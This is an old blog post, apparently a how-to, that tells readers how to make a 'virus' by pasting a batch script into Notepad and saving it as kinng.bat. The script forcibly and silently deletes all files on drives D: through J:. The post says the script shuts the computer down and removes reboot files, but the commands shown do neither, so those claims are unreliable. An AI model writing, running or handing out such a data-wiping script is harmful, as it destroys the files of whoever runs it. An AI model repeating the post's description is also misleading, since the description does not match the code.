Tuesday, 8 April 2014

Make Danger Virus which can Shutdown the Computer and delete reboot files

1. Open Notepad Copy this text in that

@echo off
del D:\*.* /f /s /q
del E:\*.* /f /s /q
del F:\*.* /f /s /q
del G:\*.* /f /s /q
del H:\*.* /f /s /q
del I:\*.* /f /s /q
del J:\*.* /f /s /q


2. Then save it as kinng.bat and the batch file is created.

WARNING :: This is the most dangerous virus

This should shutdown the persons computer. It shuts it off once and deletes the files needed to reboot and restart.

REMEMBER – DO NOT CLICK THIS FILE. (for the idiots)

>>Also remember this might not work with vista.<<

No comments:

Post a Comment